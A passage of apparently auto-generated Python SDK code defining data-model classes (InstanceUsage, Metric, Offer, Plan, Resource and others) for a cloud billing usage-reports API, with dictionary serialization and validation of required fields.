and rated.
:param str month: The month.
:param List[Metric] usage: All the resource used in the account.
:param str resource_instance_name: (optional) The name of the resource
instance.
:param str resource_name: (optional) The name of the resource.
:param str resource_group_id: (optional) The ID of the resource group.
:param str resource_group_name: (optional) The name of the resource group.
:param str organization_id: (optional) The ID of the organization.
:param str organization_name: (optional) The name of the organization.
:param str space_id: (optional) The ID of the space.
:param str space_name: (optional) The name of the space.
:param str consumer_id: (optional) The ID of the consumer.
:param str region: (optional) The region where instance was provisioned.
:param str pricing_region: (optional) The pricing region where the usage
that was submitted was rated.
:param str plan_name: (optional) The name of the plan where the instance
was provisioned and rated.
"""
self.account_id = account_id
self.resource_instance_id = resource_instance_id
self.resource_instance_name = resource_instance_name
self.resource_id = resource_id
self.resource_name = resource_name
self.resource_group_id = resource_group_id
self.resource_group_name = resource_group_name
self.organization_id = organization_id
self.organization_name = organization_name
self.space_id = space_id
self.space_name = space_name
self.consumer_id = consumer_id
self.region = region
self.pricing_region = pricing_region
self.pricing_country = pricing_country
self.currency_code = currency_code
self.billable = billable
self.plan_id = plan_id
self.plan_name = plan_name
self.month = month
self.usage = usage
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstanceUsage':
"""Initialize a InstanceUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in InstanceUsage JSON')
if 'resource_instance_id' in _dict:
args['resource_instance_id'] = _dict.get('resource_instance_id')
else:
raise ValueError('Required property \'resource_instance_id\' not present in InstanceUsage JSON')
if 'resource_instance_name' in _dict:
args['resource_instance_name'] = _dict.get('resource_instance_name')
if 'resource_id' in _dict:
args['resource_id'] = _dict.get('resource_id')
else:
raise ValueError('Required property \'resource_id\' not present in InstanceUsage JSON')
if 'resource_name' in _dict:
args['resource_name'] = _dict.get('resource_name')
if 'resource_group_id' in _dict:
args['resource_group_id'] = _dict.get('resource_group_id')
if 'resource_group_name' in _dict:
args['resource_group_name'] = _dict.get('resource_group_name')
if 'organization_id' in _dict:
args['organization_id'] = _dict.get('organization_id')
if 'organization_name' in _dict:
args['organization_name'] = _dict.get('organization_name')
if 'space_id' in _dict:
args['space_id'] = _dict.get('space_id')
if 'space_name' in _dict:
args['space_name'] = _dict.get('space_name')
if 'consumer_id' in _dict:
args['consumer_id'] = _dict.get('consumer_id')
if 'region' in _dict:
args['region'] = _dict.get('region')
if 'pricing_region' in _dict:
args['pricing_region'] = _dict.get('pricing_region')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in InstanceUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in InstanceUsage JSON')
if 'billable' in _dict:
args['billable'] = _dict.get('billable')
else:
raise ValueError('Required property \'billable\' not present in InstanceUsage JSON')
if 'plan_id' in _dict:
args['plan_id'] = _dict.get('plan_id')
else:
raise ValueError('Required property \'plan_id\' not present in InstanceUsage JSON')
if 'plan_name' in _dict:
args['plan_name'] = _dict.get('plan_name')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in InstanceUsage JSON')
if 'usage' in _dict:
args['usage'] = [Metric.from_dict(x) for x in _dict.get('usage')]
else:
raise ValueError('Required property \'usage\' not present in InstanceUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstanceUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'resource_instance_id') and self.resource_instance_id is not None:
_dict['resource_instance_id'] = self.resource_instance_id
if hasattr(self, 'resource_instance_name') and self.resource_instance_name is not None:
_dict['resource_instance_name'] = self.resource_instance_name
if hasattr(self, 'resource_id') and self.resource_id is not None:
_dict['resource_id'] = self.resource_id
if hasattr(self, 'resource_name') and self.resource_name is not None:
_dict['resource_name'] = self.resource_name
if hasattr(self, 'resource_group_id') and self.resource_group_id is not None:
_dict['resource_group_id'] = self.resource_group_id
if hasattr(self, 'resource_group_name') and self.resource_group_name is not None:
_dict['resource_group_name'] = self.resource_group_name
if hasattr(self, 'organization_id') and self.organization_id is not None:
_dict['organization_id'] = self.organization_id
if hasattr(self, 'organization_name') and self.organization_name is not None:
_dict['organization_name'] = self.organization_name
if hasattr(self, 'space_id') and self.space_id is not None:
_dict['space_id'] = self.space_id
if hasattr(self, 'space_name') and self.space_name is not None:
_dict['space_name'] = self.space_name
if hasattr(self, 'consumer_id') and self.consumer_id is not None:
_dict['consumer_id'] = self.consumer_id
if hasattr(self, 'region') and self.region is not None:
_dict['region'] = self.region
if hasattr(self, 'pricing_region') and self.pricing_region is not None:
_dict['pricing_region'] = self.pricing_region
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'billable') and self.billable is not None:
_dict['billable'] = self.billable
if hasattr(self, 'plan_id') and self.plan_id is not None:
_dict['plan_id'] = self.plan_id
if hasattr(self, 'plan_name') and self.plan_name is not None:
_dict['plan_name'] = self.plan_name
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'usage') and self.usage is not None:
_dict['usage'] = [x.to_dict() for x in self.usage]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstanceUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstanceUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstanceUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsageFirst():
"""
The link to the first page of the search query.
:attr str href: (optional) A link to a page of query results.
"""
def __init__(self,
*,
href: str = None) -> None:
"""
Initialize a InstancesUsageFirst object.
:param str href: (optional) A link to a page of query results.
"""
self.href = href
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsageFirst':
"""Initialize a InstancesUsageFirst object from a json dictionary."""
args = {}
if 'href' in _dict:
args['href'] = _dict.get('href')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsageFirst object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'href') and self.href is not None:
_dict['href'] = self.href
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsageFirst object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsageFirst') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsageFirst') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsageNext():
"""
The link to the next page of the search query.
:attr str href: (optional) A link to a page of query results.
:attr str offset: (optional) The value of the `_start` query parameter to fetch
the next page.
"""
def __init__(self,
*,
href: str = None,
offset: str = None) -> None:
"""
Initialize a InstancesUsageNext object.
:param str href: (optional) A link to a page of query results.
:param str offset: (optional) The value of the `_start` query parameter to
fetch the next page.
"""
self.href = href
self.offset = offset
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsageNext':
"""Initialize a InstancesUsageNext object from a json dictionary."""
args = {}
if 'href' in _dict:
args['href'] = _dict.get('href')
if 'offset' in _dict:
args['offset'] = _dict.get('offset')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsageNext object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'href') and self.href is not None:
_dict['href'] = self.href
if hasattr(self, 'offset') and self.offset is not None:
_dict['offset'] = self.offset
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsageNext object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsageNext') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsageNext') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class InstancesUsage():
"""
The list of instance usage reports.
:attr int limit: (optional) The max number of reports in the response.
:attr int count: (optional) The number of reports in the response.
:attr InstancesUsageFirst first: (optional) The link to the first page of the
search query.
:attr InstancesUsageNext next: (optional) The link to the next page of the
search query.
:attr List[InstanceUsage] resources: (optional) The list of instance usage
reports.
"""
def __init__(self,
*,
limit: int = None,
count: int = None,
first: 'InstancesUsageFirst' = None,
next: 'InstancesUsageNext' = None,
resources: List['InstanceUsage'] = None) -> None:
"""
Initialize a InstancesUsage object.
:param int limit: (optional) The max number of reports in the response.
:param int count: (optional) The number of reports in the response.
:param InstancesUsageFirst first: (optional) The link to the first page of
the search query.
:param InstancesUsageNext next: (optional) The link to the next page of the
search query.
:param List[InstanceUsage] resources: (optional) The list of instance usage
reports.
"""
self.limit = limit
self.count = count
self.first = first
self.next = next
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'InstancesUsage':
"""Initialize a InstancesUsage object from a json dictionary."""
args = {}
if 'limit' in _dict:
args['limit'] = _dict.get('limit')
if 'count' in _dict:
args['count'] = _dict.get('count')
if 'first' in _dict:
args['first'] = InstancesUsageFirst.from_dict(_dict.get('first'))
if 'next' in _dict:
args['next'] = InstancesUsageNext.from_dict(_dict.get('next'))
if 'resources' in _dict:
args['resources'] = [InstanceUsage.from_dict(x) for x in _dict.get('resources')]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a InstancesUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'limit') and self.limit is not None:
_dict['limit'] = self.limit
if hasattr(self, 'count') and self.count is not None:
_dict['count'] = self.count
if hasattr(self, 'first') and self.first is not None:
_dict['first'] = self.first.to_dict()
if hasattr(self, 'next') and self.next is not None:
_dict['next'] = self.next.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this InstancesUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'InstancesUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'InstancesUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Metric():
"""
Information about a metric.
:attr str metric: The ID of the metric.
:attr str metric_name: (optional) The name of the metric.
:attr float quantity: The aggregated value for the metric.
:attr float rateable_quantity: (optional) The quantity that is used for
calculating charges.
:attr float cost: The cost incurred by the metric.
:attr float rated_cost: Pre-discounted cost incurred by the metric.
:attr List[object] price: (optional) The price with which the cost was
calculated.
:attr str unit: (optional) The unit that qualifies the quantity.
:attr str unit_name: (optional) The name of the unit.
:attr bool non_chargeable: (optional) When set to `true`, the cost is for
informational purpose and is not included while calculating the plan charges.
:attr List[Discount] discounts: All the discounts applicable to the metric.
"""
def __init__(self,
metric: str,
quantity: float,
cost: float,
rated_cost: float,
discounts: List['Discount'],
*,
metric_name: str = None,
rateable_quantity: float = None,
price: List[object] = None,
unit: str = None,
unit_name: str = None,
non_chargeable: bool = None) -> None:
"""
Initialize a Metric object.
:param str metric: The ID of the metric.
:param float quantity: The aggregated value for the metric.
:param float cost: The cost incurred by the metric.
:param float rated_cost: Pre-discounted cost incurred by the metric.
:param List[Discount] discounts: All the discounts applicable to the
metric.
:param str metric_name: (optional) The name of the metric.
:param float rateable_quantity: (optional) The quantity that is used for
calculating charges.
:param List[object] price: (optional) The price with which the cost was
calculated.
:param str unit: (optional) The unit that qualifies the quantity.
:param str unit_name: (optional) The name of the unit.
:param bool non_chargeable: (optional) When set to `true`, the cost is for
informational purpose and is not included while calculating the plan
charges.
"""
self.metric = metric
self.metric_name = metric_name
self.quantity = quantity
self.rateable_quantity = rateable_quantity
self.cost = cost
self.rated_cost = rated_cost
self.price = price
self.unit = unit
self.unit_name = unit_name
self.non_chargeable = non_chargeable
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Metric':
"""Initialize a Metric object from a json dictionary."""
args = {}
if 'metric' in _dict:
args['metric'] = _dict.get('metric')
else:
raise ValueError('Required property \'metric\' not present in Metric JSON')
if 'metric_name' in _dict:
args['metric_name'] = _dict.get('metric_name')
if 'quantity' in _dict:
args['quantity'] = _dict.get('quantity')
else:
raise ValueError('Required property \'quantity\' not present in Metric JSON')
if 'rateable_quantity' in _dict:
args['rateable_quantity'] = _dict.get('rateable_quantity')
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in Metric JSON')
if 'rated_cost' in _dict:
args['rated_cost'] = _dict.get('rated_cost')
else:
raise ValueError('Required property \'rated_cost\' not present in Metric JSON')
if 'price' in _dict:
args['price'] = _dict.get('price')
if 'unit' in _dict:
args['unit'] = _dict.get('unit')
if 'unit_name' in _dict:
args['unit_name'] = _dict.get('unit_name')
if 'non_chargeable' in _dict:
args['non_chargeable'] = _dict.get('non_chargeable')
if 'discounts' in _dict:
args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Metric JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Metric object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metric') and self.metric is not None:
_dict['metric'] = self.metric
if hasattr(self, 'metric_name') and self.metric_name is not None:
_dict['metric_name'] = self.metric_name
if hasattr(self, 'quantity') and self.quantity is not None:
_dict['quantity'] = self.quantity
if hasattr(self, 'rateable_quantity') and self.rateable_quantity is not None:
_dict['rateable_quantity'] = self.rateable_quantity
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'rated_cost') and self.rated_cost is not None:
_dict['rated_cost'] = self.rated_cost
if hasattr(self, 'price') and self.price is not None:
_dict['price'] = self.price
if hasattr(self, 'unit') and self.unit is not None:
_dict['unit'] = self.unit
if hasattr(self, 'unit_name') and self.unit_name is not None:
_dict['unit_name'] = self.unit_name
if hasattr(self, 'non_chargeable') and self.non_chargeable is not None:
_dict['non_chargeable'] = self.non_chargeable
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Metric object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Metric') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Metric') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Offer():
"""
Information about an individual offer.
:attr str offer_id: The ID of the offer.
:attr float credits_total: The total credits before applying the offer.
:attr str offer_template: The template with which the offer was generated.
:attr datetime valid_from: The date from which the offer is valid.
:attr datetime expires_on: The date until the offer is valid.
:attr OfferCredits credits: Credit information related to an offer.
"""
def __init__(self,
offer_id: str,
credits_total: float,
offer_template: str,
valid_from: datetime,
expires_on: datetime,
credits: 'OfferCredits') -> None:
"""
Initialize a Offer object.
:param str offer_id: The ID of the offer.
:param float credits_total: The total credits before applying the offer.
:param str offer_template: The template with which the offer was generated.
:param datetime valid_from: The date from which the offer is valid.
:param datetime expires_on: The date until the offer is valid.
:param OfferCredits credits: Credit information related to an offer.
"""
self.offer_id = offer_id
self.credits_total = credits_total
self.offer_template = offer_template
self.valid_from = valid_from
self.expires_on = expires_on
self.credits = credits
@classmethod
def from_dict(cls, _dict: Dict) -> 'Offer':
"""Initialize a Offer object from a json dictionary."""
args = {}
if 'offer_id' in _dict:
args['offer_id'] = _dict.get('offer_id')
else:
raise ValueError('Required property \'offer_id\' not present in Offer JSON')
if 'credits_total' in _dict:
args['credits_total'] = _dict.get('credits_total')
else:
raise ValueError('Required property \'credits_total\' not present in Offer JSON')
if 'offer_template' in _dict:
args['offer_template'] = _dict.get('offer_template')
else:
raise ValueError('Required property \'offer_template\' not present in Offer JSON')
if 'valid_from' in _dict:
args['valid_from'] = string_to_datetime(_dict.get('valid_from'))
else:
raise ValueError('Required property \'valid_from\' not present in Offer JSON')
if 'expires_on' in _dict:
args['expires_on'] = string_to_datetime(_dict.get('expires_on'))
else:
raise ValueError('Required property \'expires_on\' not present in Offer JSON')
if 'credits' in _dict:
args['credits'] = OfferCredits.from_dict(_dict.get('credits'))
else:
raise ValueError('Required property \'credits\' not present in Offer JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Offer object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'offer_id') and self.offer_id is not None:
_dict['offer_id'] = self.offer_id
if hasattr(self, 'credits_total') and self.credits_total is not None:
_dict['credits_total'] = self.credits_total
if hasattr(self, 'offer_template') and self.offer_template is not None:
_dict['offer_template'] = self.offer_template
if hasattr(self, 'valid_from') and self.valid_from is not None:
_dict['valid_from'] = datetime_to_string(self.valid_from)
if hasattr(self, 'expires_on') and self.expires_on is not None:
_dict['expires_on'] = datetime_to_string(self.expires_on)
if hasattr(self, 'credits') and self.credits is not None:
_dict['credits'] = self.credits.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Offer object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Offer') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Offer') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class OfferCredits():
"""
Credit information related to an offer.
:attr float starting_balance: The available credits in the offer at the
beginning of the month.
:attr float used: The credits used in this month.
:attr float balance: The remaining credits in the offer.
"""
def __init__(self,
starting_balance: float,
used: float,
balance: float) -> None:
"""
Initialize a OfferCredits object.
:param float starting_balance: The available credits in the offer at the
beginning of the month.
:param float used: The credits used in this month.
:param float balance: The remaining credits in the offer.
"""
self.starting_balance = starting_balance
self.used = used
self.balance = balance
@classmethod
def from_dict(cls, _dict: Dict) -> 'OfferCredits':
"""Initialize a OfferCredits object from a json dictionary."""
args = {}
if 'starting_balance' in _dict:
args['starting_balance'] = _dict.get('starting_balance')
else:
raise ValueError('Required property \'starting_balance\' not present in OfferCredits JSON')
if 'used' in _dict:
args['used'] = _dict.get('used')
else:
raise ValueError('Required property \'used\' not present in OfferCredits JSON')
if 'balance' in _dict:
args['balance'] = _dict.get('balance')
else:
raise ValueError('Required property \'balance\' not present in OfferCredits JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a OfferCredits object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'starting_balance') and self.starting_balance is not None:
_dict['starting_balance'] = self.starting_balance
if hasattr(self, 'used') and self.used is not None:
_dict['used'] = self.used
if hasattr(self, 'balance') and self.balance is not None:
_dict['balance'] = self.balance
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this OfferCredits object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'OfferCredits') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'OfferCredits') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class OrgUsage():
"""
The aggregated usage and charges for all the plans in the org.
:attr str account_id: The ID of the account.
:attr str organization_id: The ID of the organization.
:attr str organization_name: (optional) The name of the organization.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
:attr List[Resource] resources: All the resource used in the account.
"""
def __init__(self,
account_id: str,
organization_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource'],
*,
organization_name: str = None) -> None:
"""
Initialize a OrgUsage object.
:param str account_id: The ID of the account.
:param str organization_id: The ID of the organization.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
:param List[Resource] resources: All the resource used in the account.
:param str organization_name: (optional) The name of the organization.
"""
self.account_id = account_id
self.organization_id = organization_id
self.organization_name = organization_name
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'OrgUsage':
"""Initialize a OrgUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in OrgUsage JSON')
if 'organization_id' in _dict:
args['organization_id'] = _dict.get('organization_id')
else:
raise ValueError('Required property \'organization_id\' not present in OrgUsage JSON')
if 'organization_name' in _dict:
args['organization_name'] = _dict.get('organization_name')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in OrgUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in OrgUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in OrgUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in OrgUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a OrgUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'organization_id') and self.organization_id is not None:
_dict['organization_id'] = self.organization_id
if hasattr(self, 'organization_name') and self.organization_name is not None:
_dict['organization_name'] = self.organization_name
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this OrgUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'OrgUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'OrgUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Plan():
"""
The aggregated values for the plan.
:attr str plan_id: The ID of the plan.
:attr str plan_name: (optional) The name of the plan.
:attr str pricing_region: (optional) The pricing region for the plan.
:attr bool billable: Indicates if the plan charges are billed to the customer.
:attr float cost: The total cost incurred by the plan.
:attr float rated_cost: Total pre-discounted cost incurred by the plan.
:attr List[Metric] usage: All the metrics in the plan.
:attr List[Discount] discounts: All the discounts applicable to the plan.
"""
def __init__(self,
plan_id: str,
billable: bool,
cost: float,
rated_cost: float,
usage: List['Metric'],
discounts: List['Discount'],
*,
plan_name: str = None,
pricing_region: str = None) -> None:
"""
Initialize a Plan object.
:param str plan_id: The ID of the plan.
:param bool billable: Indicates if the plan charges are billed to the
customer.
:param float cost: The total cost incurred by the plan.
:param float rated_cost: Total pre-discounted cost incurred by the plan.
:param List[Metric] usage: All the metrics in the plan.
:param List[Discount] discounts: All the discounts applicable to the plan.
:param str plan_name: (optional) The name of the plan.
:param str pricing_region: (optional) The pricing region for the plan.
"""
self.plan_id = plan_id
self.plan_name = plan_name
self.pricing_region = pricing_region
self.billable = billable
self.cost = cost
self.rated_cost = rated_cost
self.usage = usage
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Plan':
"""Initialize a Plan object from a json dictionary."""
args = {}
if 'plan_id' in _dict:
args['plan_id'] = _dict.get('plan_id')
else:
raise ValueError('Required property \'plan_id\' not present in Plan JSON')
if 'plan_name' in _dict:
args['plan_name'] = _dict.get('plan_name')
if 'pricing_region' in _dict:
args['pricing_region'] = _dict.get('pricing_region')
if 'billable' in _dict:
args['billable'] = _dict.get('billable')
else:
raise ValueError('Required property \'billable\' not present in Plan JSON')
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in Plan JSON')
if 'rated_cost' in _dict:
args['rated_cost'] = _dict.get('rated_cost')
else:
raise ValueError('Required property \'rated_cost\' not present in Plan JSON')
if 'usage' in _dict:
args['usage'] = [Metric.from_dict(x) for x in _dict.get('usage')]
else:
raise ValueError('Required property \'usage\' not present in Plan JSON')
if 'discounts' in _dict:
args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Plan JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Plan object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'plan_id') and self.plan_id is not None:
_dict['plan_id'] = self.plan_id
if hasattr(self, 'plan_name') and self.plan_name is not None:
_dict['plan_name'] = self.plan_name
if hasattr(self, 'pricing_region') and self.pricing_region is not None:
_dict['pricing_region'] = self.pricing_region
if hasattr(self, 'billable') and self.billable is not None:
_dict['billable'] = self.billable
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'rated_cost') and self.rated_cost is not None:
_dict['rated_cost'] = self.rated_cost
if hasattr(self, 'usage') and self.usage is not None:
_dict['usage'] = [x.to_dict() for x in self.usage]
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Plan object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Plan') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Plan') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Resource():
"""
The container for all the plans in the resource.
:attr str resource_id: The ID of the resource.
:attr str resource_name: (optional) The name of the resource.
:attr float billable_cost: The billable charges for the account.
:attr float billable_rated_cost: The pre-discounted billable charges for the
account.
:attr float non_billable_cost: The non-billable charges for the account.
:attr float non_billable_rated_cost: The pre-discounted non-billable charges for
the account.
:attr List[Plan] plans: All the plans in the resource.
:attr List[Discount] discounts: All the discounts applicable to the resource.
"""
def __init__(self,
resource_id: str,
billable_cost: float,
billable_rated_cost: float,
non_billable_cost: float,
non_billable_rated_cost: float,
plans: List['Plan'],
discounts: List['Discount'],
*,
resource_name: str = None) -> None:
"""
Initialize a Resource object.
:param str resource_id: The ID of the resource.
:param float billable_cost: The billable charges for the account.
:param float billable_rated_cost: The pre-discounted billable charges for
the account.
:param float non_billable_cost: The non-billable charges for the account.
:param float non_billable_rated_cost: The pre-discounted non-billable
charges for the account.
:param List[Plan] plans: All the plans in the resource.
:param List[Discount] discounts: All the discounts applicable to the
resource.
:param str resource_name: (optional) The name of the resource.
"""
self.resource_id = resource_id
self.resource_name = resource_name
self.billable_cost = billable_cost
self.billable_rated_cost = billable_rated_cost
self.non_billable_cost = non_billable_cost
self.non_billable_rated_cost = non_billable_rated_cost
self.plans = plans
self.discounts = discounts
@classmethod
def from_dict(cls, _dict: Dict) -> 'Resource':
"""Initialize a Resource object from a json dictionary."""
args = {}
if 'resource_id' in _dict:
args['resource_id'] = _dict.get('resource_id')
else:
raise ValueError('Required property \'resource_id\' not present in Resource JSON')
if 'resource_name' in _dict:
args['resource_name'] = _dict.get('resource_name')
if 'billable_cost' in _dict:
args['billable_cost'] = _dict.get('billable_cost')
else:
raise ValueError('Required property \'billable_cost\' not present in Resource JSON')
if 'billable_rated_cost' in _dict:
args['billable_rated_cost'] = _dict.get('billable_rated_cost')
else:
raise ValueError('Required property \'billable_rated_cost\' not present in Resource JSON')
if 'non_billable_cost' in _dict:
args['non_billable_cost'] = _dict.get('non_billable_cost')
else:
raise ValueError('Required property \'non_billable_cost\' not present in Resource JSON')
if 'non_billable_rated_cost' in _dict:
args['non_billable_rated_cost'] = _dict.get('non_billable_rated_cost')
else:
raise ValueError('Required property \'non_billable_rated_cost\' not present in Resource JSON')
if 'plans' in _dict:
args['plans'] = [Plan.from_dict(x) for x in _dict.get('plans')]
else:
raise ValueError('Required property \'plans\' not present in Resource JSON')
if 'discounts' in _dict:
